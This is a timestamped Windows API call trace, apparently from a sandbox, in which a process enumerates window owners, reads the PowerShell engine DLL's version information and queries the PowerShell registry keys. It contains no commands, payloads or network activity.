	[0107.937] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.937] GetLastError () returned 0x0
	[0107.937] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.937] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x448
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x778
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x538
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.938] GetLastError () returned 0x0
	[0107.938] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x938
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7c8
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xbdc
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xbe0
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9f4
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x964
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9e8
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9e8
	[0107.939] GetLastError () returned 0x0
	[0107.939] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xb40
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xa00
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9f0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9e0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9d0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9c0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9b0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9a0
	[0107.940] GetLastError () returned 0x0
	[0107.940] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x990
	[0107.940] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x980
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x970
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x960
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x950
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x940
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x930
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x920
	[0107.941] GetLastError () returned 0x0
	[0107.941] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x910
	[0107.941] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x900
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8f0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8e0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8d0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8c0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8b0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8a0
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x890
	[0107.942] GetLastError () returned 0x0
	[0107.942] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x880
	[0107.942] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x870
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x860
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x850
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x840
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x830
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x820
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x810
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x20c
	[0107.943] GetLastError () returned 0x0
	[0107.943] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7c4
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xc0
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x688
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x6c0
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x408
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7d4
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x544
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x540
	[0107.944] GetLastError () returned 0x0
	[0107.944] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x71c
	[0107.944] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x31c
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7ec
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5b8
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x754
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x664
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x640
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x700
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x410
	[0107.945] GetLastError () returned 0x0
	[0107.945] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7a0
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x3b4
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5cc
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5d4
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7c0
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x364
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x240
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x560
	[0107.946] GetLastError () returned 0x0
	[0107.946] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x57c
	[0107.946] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7b0
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x6a4
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x32c
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x670
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x50c
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x514
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f0
	[0107.947] GetLastError () returned 0x0
	[0107.947] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x58c
	[0107.947] GetLastError () returned 0x0
	[0107.948] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.948] GetLastError () returned 0x0
	[0107.948] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f4
	[0107.948] GetLastError () returned 0x0
	[0107.948] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x794
	[0107.948] GetLastError () returned 0x0
	[0107.948] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.948] GetLastError () returned 0x0
	[0107.948] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x778
	[0107.948] GetLastError () returned 0x0
	[0107.948] GetLastError () returned 0x0
	[0108.211] WerSetFlags () returned 0x0
	[0108.889] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0108.892] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e87c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e878 | out: pulNumLanguages=0x14e87c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e878) returned 1
	[0108.892] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e87c, pwszLanguagesBuffer=0x2a15b38, pcchLanguagesBuffer=0x14e878 | out: pulNumLanguages=0x14e87c, pwszLanguagesBuffer=0x2a15b38, pcchLanguagesBuffer=0x14e878) returned 1
	[0108.986] GetUserDefaultLocaleName (in: lpLocaleName=0x721bd8, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0109.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.301] GetLastError () returned 0xcb
	[0109.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.303] GetLastError () returned 0xcb
	[0109.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.305] GetLastError () returned 0xcb
	[0109.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.314] GetLastError () returned 0xcb
	[0109.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.314] GetLastError () returned 0xcb
	[0109.315] SetErrorMode (uMode=0x1) returned 0x1
	[0109.315] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14e788 | out: lpFileInformation=0x14e788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0109.315] GetLastError () returned 0xcb
	[0109.315] SetErrorMode (uMode=0x1) returned 0x1
	[0109.315] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14e80c | out: lpdwHandle=0x14e80c) returned 0x94c
	[0109.316] GetLastError () returned 0x0
	[0109.316] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a18068 | out: lpData=0x2a18068) returned 1
	[0109.316] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e7d8, puLen=0x14e7d4 | out: lplpBuffer=0x14e7d8*=0x2a18104, puLen=0x14e7d4) returned 1
	[0109.316] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a181e0, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0109.317] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a18234, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="System.Management.Automation") returned 28
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0109.317] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a18290, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.317] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a182d0, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.317] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a18338, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0109.317] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a183d4, puLen=0x14e750) returned 1
	[0109.317] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.317] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a18438, puLen=0x14e750) returned 1
	[0109.318] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0109.318] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a184b4, puLen=0x14e750) returned 1
	[0109.318] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.318] lstrcpyW (in: lpString1=0x721bd8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x2a1815c, puLen=0x14e750) returned 1
	[0109.318] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0109.318] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x0, puLen=0x14e750) returned 0
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x0, puLen=0x14e750) returned 0
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14e754, puLen=0x14e750 | out: lplpBuffer=0x14e754*=0x0, puLen=0x14e750) returned 0
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e748, puLen=0x14e744 | out: lplpBuffer=0x14e748*=0x2a18104, puLen=0x14e744) returned 1
	[0109.318] VerLanguageNameW (in: wLang=0x0, szLang=0x721bd8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0109.318] VerQueryValueW (in: pBlock=0x2a18068, lpSubBlock="\\", lplpBuffer=0x14e75c, puLen=0x14e758 | out: lplpBuffer=0x14e75c*=0x2a18090, puLen=0x14e758) returned 1
	[0109.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.327] GetLastError () returned 0xcb
	[0109.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.638] GetLastError () returned 0xcb
	[0109.644] lstrlenW (lpString="䅁") returned 1
	[0109.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e720 | out: phkResult=0x14e720*=0x320) returned 0x0
	[0109.649] RegOpenKeyExW (in: hKey=0x320, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e724 | out: phkResult=0x14e724*=0x324) returned 0x0
	[0109.649] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e758 | out: phkResult=0x14e758*=0x328) returned 0x0
	[0109.655] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e798, lpData=0x0, lpcbData=0x14e794*=0x0 | out: lpType=0x14e798*=0x1, lpData=0x0, lpcbData=0x14e794*=0x56) returned 0x0
	[0109.658] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e798, lpData=0x721bd8, lpcbData=0x14e794*=0x56 | out: lpType=0x14e798*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e794*=0x56) returned 0x0
